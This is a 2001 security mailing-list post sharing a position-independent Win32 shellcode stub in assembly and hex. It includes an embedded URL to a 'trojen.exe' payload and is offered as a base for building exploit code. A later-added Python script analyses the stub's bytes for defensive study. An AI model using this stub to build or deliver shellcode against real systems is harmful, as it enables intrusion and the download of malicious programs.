From: Enrique A. Compań Gzz. [enrique@virtekweb.net]
Sent: Thursday, September 06, 2001 8:31 PM
To: vuln-dev@securityfocus.com
Subject: Small win32 shellcode demo

This is an ultra early demo of the new shellcode I'm developing, designed to be fast & small & polymorphic, without hard coded values. I have a previous version of a finished shellcode like this one, I'll release it soon...

The Shell Code :
-----------------------------

This code was developed with masm32. This is only the base of the shellcode, it can be used to develop your own stuff.

Features:

* No need to know the address of our code, no need to have the address in a register, no matter what technique you use to exploit the buffer (shellcode in the buffer, shellcode after EIP, jump back... etc)
* No Nulls
* Fast & Small

You can even compile this code and run the EXE and it will run and terminate normally... (nice ;-))

.386                                    ; Next time we'll be using 586 code..... optimize!
.model flat, stdcall

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

EXITPROCESS_ADDR EQU 077E8F32Dh         ; We'll get rid of this later ;-)

.code

shell_code_start:
    jmp pi_offset                       ; Jump to call back function

call_back:
    pop esi                             ; ESI now points to the first variable (in this case "url"),
                                        ; no matter the size of the "real_code", ESI will always point there

real_code_start:
    xor eax, eax                        ; Our real code begins here...
    push eax
    mov eax, EXITPROCESS_ADDR
    call eax                            ; Do nothing but call ExitProcess with a hard-coded value (just for testing)

real_code_end:

pi_offset:
    call near ptr call_back             ; Return and push the address

vars_start:
    url db "http://box.org/trojen.exe", 0ffh   ; Just a var

end shell_code_start

000001F4 0000 0000 0000 0000 0000 0000 EB0B 5E33 C050 B82D ..............^3.P.-
00000208 F3E8 77FF D0E8 F0FF FFFF 6874 7470 3A2F 2F77 7777 ..w.......http://www
0000021C 2E76 6972 7465 6B77 6562 2E6E 6574 2F6E 6378 3939 .virtekweb.net/ncx99
00000230 2E65 7865 FF00                                    .exe..

I've seen variations of this technique... but this one is just fine, it has the qualities of a good s-code.

Oh yeah... I recommend you use TASM32 or MASM32.

BTW I'm collecting some references about this stuff you'll find very useful... I'll give them away soon.

My stuff to come...

Enrique A. Compań Gzz.
Virtek Labs

Greets: RaiSe, Undersec Team, Net-Search E-Zine, the lists ;-) and all the rest...
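Added example, not part of the post above: a small Python analysis script that takes the bytes from the hex dump, decodes the short jmp and the backward call to confirm the jmp/call/pop layout (the call must land on the pop, and the pushed return address must be the start of the trailing data), checks the null-free claim, and flags the hard-coded ExitProcess address that still ties the stub to one kernel32 build. The function names and the GetPC heuristic are my own, not the author's.

```python
"""Decode the jmp/call/pop (GetPC) stub from the post's hex dump."""
import struct

# Transcribed from the dump above, file offset 0x200 onward (PE padding before
# and the trailing 00 after dropped). Note the data string in the assembled
# dump differs from the one in the source listing.
SHELLCODE = bytes.fromhex(
    "EB0B5E33C050B82DF3E877FFD0E8F0FFFFFF"
    "687474703A2F2F7777772E766972"
    "74656B7765622E6E65742F6E637839392E657865FF"
)
POP_REG = range(0x58, 0x60)  # single-byte pop eax .. pop edi


def find_getpc_stubs(code):
    """(call_off, pop_off, pushed_addr) for every E8 rel32 whose backward
    target is a one-byte POP: how the payload learns its own address, and
    a common scan heuristic for position-independent stubs."""
    hits = []
    for i in range(len(code) - 4):
        if code[i] != 0xE8:
            continue
        rel = struct.unpack_from("<i", code, i + 1)[0]
        nxt, target = i + 5, i + 5 + rel
        if rel < 0 and 0 <= target < len(code) and code[target] in POP_REG:
            hits.append((i, target, nxt))
    return hits


def hardcoded_calls(code):
    """imm32 values used as 'mov eax, imm32; call eax': the absolute
    ExitProcess address that ties this stub to one kernel32 build."""
    return [struct.unpack_from("<I", code, i + 1)[0]
            for i in range(len(code) - 6)
            if code[i] == 0xB8 and code[i + 5:i + 7] == b"\xff\xd0"]


def analyze(code, terminator=0xFF):
    """Return the stub's layout, or None if no GetPC pattern is present."""
    stubs = find_getpc_stubs(code)
    if not stubs:
        return None
    call_off, pop_off, data_off = stubs[0]
    # Entry short jump (EB rel8) must land exactly on that CALL.
    jmp_ok = code[0] == 0xEB and 2 + struct.unpack_from("<b", code, 1)[0] == call_off
    end = code.index(terminator, data_off)  # data ends in 0xFF, not NUL
    return {"jmp_to_call": jmp_ok, "pop_offset": pop_off,
            "data_offset": data_off, "data": code[data_off:end],
            "null_free": b"\x00" not in code,
            "hardcoded_calls": hardcoded_calls(code)}
```

Running `analyze(SHELLCODE)` resolves the call at offset 13 back to the pop at offset 2 and the pushed address to offset 18, where the 0xFF-terminated string begins.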